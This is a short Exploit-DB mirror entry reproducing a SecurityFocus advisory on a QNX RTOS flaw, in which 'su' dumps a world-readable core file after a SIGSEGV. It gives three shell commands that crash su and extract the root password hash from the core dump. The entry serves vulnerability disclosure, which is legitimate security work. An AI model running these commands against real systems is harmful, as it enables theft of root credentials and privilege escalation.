exploit-db-mirror/exploits/linux/local/21502.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

11 lines
No EOL
585 B
Text

source: https://www.securityfocus.com/bid/4914/info
It has been reported that the 'su' utility for QNX RTOS accepts the SIGSEGV signal and dumps a world readable core file. An attacker is able to analyze the core file and obtain very sensitive information.
It is very probable that this is a kernel-based vulnerability affecting not only 'su', but other setuid programs as well
$su > /dev/null &
$kill -SEGV `ps -A | grep su | awk {'print $1'}`
$strings /var/dumps/su.core | grep ":0:0" > /tmp/mypasswd
The attacker has effectively obtained a copy of the root user's password hash.